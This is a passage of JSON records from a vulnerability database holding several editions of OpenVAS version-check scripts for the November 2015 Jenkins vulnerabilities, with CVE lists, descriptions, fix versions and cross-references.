exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif (!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(version_is_less(version:version, test_version:\"1.625.2\")) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"1.625.2\", install_path: location);\n security_message(data:report, port:port, proto:proto);\n exit(0);\n}\n\nexit(99);\n", "title": "CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)", "type": "openvas", "viewCount": 4}, "differentElements": ["references", "modified", "sourceData", "title"], "edition": 11, "lastseen": "2019-07-30T14:17:44"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.", "edition": 8, "enchantments": {"dependencies": {"modified": "2018-12-12T13:45:31", "references": [{"idList": ["1337DAY-ID-24727"], "type": "zdt"}, {"idList": ["JENKINS_CLI_DESERIALIZATION"], "type": "canvas"}, {"idList": ["REDHAT-RHSA-2016-0489.NASL", "FEDORA_2015-D7E5461DBF.NASL", "REDHAT-RHSA-2016-0070.NASL", "JENKINS_SECURITY218.NASL"], "type": "nessus"}, {"idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"], "type": "pentestit"}, {"idList": ["ASA-201511-11"], "type": "archlinux"}, {"idList": ["OPENVAS:1361412562310806621", "OPENVAS:1361412562310131309", "OPENVAS:1361412562310105820", "OPENVAS:1361412562310806920", "OPENVAS:1361412562310807001"], "type": "openvas"}, {"idList": ["PACKETSTORM:134805"], "type": "packetstorm"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/JENKINS_COMMAND", "MSF:EXPLOIT/LINUX/MISC/JENKINS_JAVA_DESERIALIZE", "MSF:EXPLOIT/LINUX/MISC/OPENNMS_JAVA_SERIALIZE"], "type": "metasploit"}, {"idList": ["EDB-ID:38983"], "type": "exploitdb"}, {"idList": ["CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5318", "CVE-2015-5325", "CVE-2015-8103"], "type": "cve"}, {"idList": ["KITPLOIT:5230099254245458698"], "type": "kitploit"}, {"idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"], "type": "impervablog"}, {"idList": ["RHSA-2016:0070", "RHSA-2016:22381", "RHSA-2016:0489"], "type": "redhat"}, {"idList": ["VU:576313"], "type": "cert"}]}, "score": {"value": 6.8, "vector": "NONE"}}, "hash": "42188471322df3db0c3e8ef49be9cfb04aec65fe5a733c4c4ac068cc604794b6", "hashmap": [{"hash": "3fe6ba291639126bca60f0b96e757310", "key": "title"}, {"hash": "53e4d762d061bcb68752f7013bb7c89d", "key": "sourceData"}, {"hash": "aaee812fcbefb91dec01613784b87fbd", "key": "references"}, {"hash": "80701cd55b5ac06d1d43d62fdc11c554", "key": "cvelist"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a97d31368d124ea1d4cd3a47fe743758", "key": "published"}, {"hash": "97be7ad8dd311237bb296ca09a9add56", "key": "pluginID"}, {"hash": "fb77f3a2d7d21df49ec9de4b6f393ef2", "key": "href"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "863c7f66728b14e4d5ca4611abfef795", "key": "modified"}, {"hash": "ed06e36139fd2ab4cabbb1d532f7f40d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "id": "OPENVAS:1361412562310808269", "lastseen": "2018-12-12T13:45:31", "modified": "2018-12-11T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310808269", "published": "2016-08-05T00:00:00", "references": ["https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11", "https://www.cloudbees.com"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cloudbees_jenkins_mult_vuln_aug16_lin.nasl 12761 2018-12-11 14:32:20Z cfischer $\n#\n# CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"$Revision: 12761 $\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-11 15:32:20 +0100 (Tue, 11 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n script_name(\"CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in while requesting jnlpJars.\n\n - An Improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"CloudBees Jenkins LTS before 1.625.2\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to CloudBees Jenkins LTS 1.625.2 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_jenkins_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 8080);\n script_xref(name:\"URL\", value:\"https://www.cloudbees.com\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!jenkinPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!jenkinVer = get_app_version(cpe:CPE, port:jenkinPort)){\n exit(0);\n}\n\nif(version_is_less(version:jenkinVer, test_version:\"1.625.2\")){\n report = report_fixed_ver(installed_version:jenkinVer, fixed_version:\"1.625.2\");\n security_message(data:report, port:jenkinPort);\n exit(0);\n}\n\nexit(99);", "title": "CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)", "type": "openvas", "viewCount": 3}, "differentElements": ["cvss"], "edition": 8, "lastseen": "2018-12-12T13:45:31"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-5323", "CVE-2015-7537", "CVE-2015-7536", "CVE-2015-7539", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5317", "CVE-2015-5321", "CVE-2015-5320", "CVE-2015-5318", "CVE-2015-5326", "CVE-2015-5325", "CVE-2015-8103"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.", "edition": 3, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "9f367e3ae8c8b96db2d5f710cb5d7b6b420ca9b9f1b588a65557fca9ffe0d549", "hashmap": [{"hash": "3fe6ba291639126bca60f0b96e757310", "key": "title"}, {"hash": "813566690a1ba159d228c15d6ac6bbd0", "key": "modified"}, {"hash": "80701cd55b5ac06d1d43d62fdc11c554", "key": "cvelist"}, {"hash": "ca6c048be0805c2614771cc6deabc9bb", "key": "sourceData"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a97d31368d124ea1d4cd3a47fe743758", "key": "published"}, {"hash": "84ac25ec4d8bb0a7c2e92f90d42d6e57", "key": "references"}, {"hash": "97be7ad8dd311237bb296ca09a9add56", "key": "pluginID"}, {"hash": "fb77f3a2d7d21df49ec9de4b6f393ef2", "key": "href"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "ed06e36139fd2ab4cabbb1d532f7f40d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808269", "id": "OPENVAS:1361412562310808269", "lastseen": "2018-04-05T15:32:00", "modified": "2018-04-04T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310808269", "published": "2016-08-05T00:00:00", "references": ["https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cloudbees_jenkins_mult_vuln_aug16_lin.nasl 9300 2018-04-04 11:55:01Z cfischer $\n#\n# CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cloudbees:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"$Revision: 9300 $\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-04 13:55:01 +0200 (Wed, 04 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n script_name(\"CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with CloudBees\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help of\n detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in while requesting jnlpJars.\n\n - An Improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"CloudBees Jenkins LTS before 1.625.2\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to CloudBees Jenkins LTS 1.625.2 or\n later. For more updates refer to https://www.cloudbees.com\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name : \"URL\" , value : \"https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_jenkins_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/installed\",\"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!jenkinPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!jenkinVer = get_app_version(cpe:CPE, port:jenkinPort)){\n exit(0);\n}\n\nif(version_is_less(version:jenkinVer, test_version:\"1.625.2\")){\n report = report_fixed_ver(installed_version:jenkinVer, fixed_version:\"1.625.2\");\n security_message(data:report, port:jenkinPort);\n exit(0);\n}\n\nexit(99);", "title": "CloudBees Jenkins Multiple Vulnerabilities August16 (Linux)", "type": "openvas", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-04-05T15:32:00"}], "edition": 13, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "80701cd55b5ac06d1d43d62fdc11c554"}, {"key": "cvss", "hash": "ed80408f65b06df34ed6dfdb743af507"}, {"key": "description", "hash": "8462a0f42042025f88b60ac6cc43fb35"}, {"key": "href", "hash": "fb77f3a2d7d21df49ec9de4b6f393ef2"}, {"key": "modified", "hash": "c6e9fb4c613a1a95ccd907c48b7a7a9e"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "97be7ad8dd311237bb296ca09a9add56"}, {"key": "published", "hash": "a97d31368d124ea1d4cd3a47fe743758"}, {"key": "references", "hash": "51576b010aab228499057cea5ee65aa4"}, {"key": "reporter", "hash": "ea106ff9c2727a6e906e8959871e7c06"}, {"key": "sourceData", "hash": "de828c7c68ab46a7a4b2030b61505146"}, {"key": "title", "hash": "8a5cab442641284f7b36ba08b47f4829"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "3a88d9697b683f7a1284e72ac72c3a299b91d739a501b8d265896312b59bcea3", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310806621", "OPENVAS:1361412562310807001", "OPENVAS:1361412562310806920", "OPENVAS:1361412562310105820", "OPENVAS:1361412562310131309"]}, {"type": "archlinux", "idList": ["ASA-201511-11"]}, {"type": "nessus", "idList": ["FEDORA_2015-D02FEEBD15.NASL", "REDHAT-RHSA-2016-0489.NASL", "FEDORA_2015-89468612F5.NASL", "FREEBSD_PKG_23AF04259EAC11E5B93700E0814CAB4E.NASL", "FEDORA_2015-938C70C840.NASL", "FEDORA_2015-D7E5461DBF.NASL", "FEDORA_2015-A433D8BA72.NASL", "REDHAT-RHSA-2016-0070.NASL", "JENKINS_SECURITY218.NASL"]}, {"type": "redhat", "idList": ["RHSA-2016:22381", "RHSA-2016:0489", "RHSA-2016:0070"]}, {"type": "cve", "idList": ["CVE-2015-7539", "CVE-2015-5319", "CVE-2015-5322", "CVE-2015-5323", "CVE-2015-7536", "CVE-2015-7537", "CVE-2015-5325", "CVE-2015-7538", "CVE-2015-5324", "CVE-2015-5326"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:134805"]}, {"type": "canvas", "idList": ["JENKINS_CLI_DESERIALIZATION"]}, {"type": "zdt", "idList": ["1337DAY-ID-24727"]}, {"type": "exploitdb", "idList": ["EDB-ID:38983"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/MISC/OPENNMS_JAVA_SERIALIZE", "MSF:EXPLOIT/LINUX/MISC/JENKINS_JAVA_DESERIALIZE", "MSF:AUXILIARY/SCANNER/HTTP/JENKINS_COMMAND"]}, {"type": "kitploit", "idList": ["KITPLOIT:5230099254245458698"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "cert", "idList": ["VU:576313"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}], "modified": "2019-10-18T15:24:34"}, "score": {"value": 7.3, "vector": "NONE", "modified": "2019-10-18T15:24:34"}, "vulnersScore": 7.3}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins Multiple Vulnerabilities - Nov15 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808269\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 09:47:29 +0530 (Fri, 05 Aug 2016)\");\n\n script_name(\"Jenkins Multiple Vulnerabilities - Nov15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in while requesting jnlpJars.\n\n - An improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"All Jenkins main line releases up to and including 1.637,\n all Jenkins LTS releases up to and including 1.625.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.638,\n Jenkins LTS users should update to 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(get_kb_item(\"jenkins/\" + port + \"/is_lts\")) {\n if(version_is_less(version:version, test_version:\"1.625.2\")) {\n vuln = TRUE;\n fix = \"1.625.2\";\n }\n} else {\n if(version_is_less(version:version, test_version:\"1.638\")) {\n vuln = TRUE;\n fix = \"1.638\";\n }\n}\n\nif(vuln) {\n report = report_fixed_ver(installed_version:version, fixed_version:fix, install_path:location);\n security_message(port:port, data:report, proto:proto);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "pluginID": "1361412562310808269", "scheme": null}

{"openvas": [{"lastseen": "2019-10-18T15:27:19", "bulletinFamily": "scanner", "description": "The host is installed with Jenkins and is\n prone to multiple vulnerabilities.\n\n This VT has been replaced by VTs ", "modified": "2019-10-17T00:00:00", "published": "2015-11-17T00:00:00", "id": "OPENVAS:1361412562310806621", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806621", "title": "Jenkins CLI Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins CLI Multiple Vulnerabilities\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806621\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\", \"CVE-2015-5324\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5325\",\n \"CVE-2015-5326\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-11-17 12:48:36 +0530 (Tue, 17 Nov 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Jenkins CLI Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Jenkins and is\n prone to multiple vulnerabilities.\n\n This VT has been replaced by VTs 'Jenkins Multiple Vulnerabilities - Nov15 (Linux)'\n (OID: 1.3.6.1.4.1.25623.1.0.808269) and 'Jenkins Multiple Vulnerabilities - Nov15 (Windows)'\n (OID: 1.3.6.1.4.1.25623.1.0.807001).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist as,\n\n - Jenkins UI allows users to see the names of jobs and builds otherwise\n inaccessible to them on the 'Fingerprints' pages.\n\n - The salt used to generate the CSRF protection tokens is a publicly accessible\n value.\n\n - When creating a job using the create-job CLI command, external entities are\n not discarded (nor processed).\n\n - JNLP slave connections did not verify that the correct secret was supplied.\n\n - The /queue/api URL could return information about items not accessible to\n the current user.\n\n - The CLI command overview and help pages in Jenkins were accessible without\n Overall/Read permission.\n\n - Access to the /jnlpJars/ URL was not limited to the specific JAR files users\n needed to access, allowing browsing directories and downloading other files in\n the Jenkins servlet resources.\n\n - API tokens of other users were exposed to admins by default.\n\n - Slaves connecting via JNLP were not subject to the optional slave-to-master\n access control.\n\n - Users with the permission to take slave nodes offline can enter arbitrary\n HTML.\n\n - An error due to unsafe deserialization.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to sensitive information, conduct XXE, XSS and CSRF\n attacks, and execute arbitrary code on the affected system.\");\n\n script_tag(name:\"affected\", value:\"All Jenkins main line releases up to and including 1.637,\n all Jenkins LTS releases up to and including 1.625.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.638,\n Jenkins LTS users should update to 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\");\n script_mandatory_keys(\"jenkins/detected\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:26:08", "bulletinFamily": "scanner", "description": "This host is installed with\n Jenkins and is prone to multiple vulnerabilities.", "modified": "2019-10-17T00:00:00", "published": "2015-12-15T00:00:00", "id": "OPENVAS:1361412562310807001", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807001", "title": "Jenkins Multiple Vulnerabilities - Nov15 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins Multiple Vulnerabilities - Nov15 (Windows)\n#\n# Authors:\n# Rinu Kuriakose 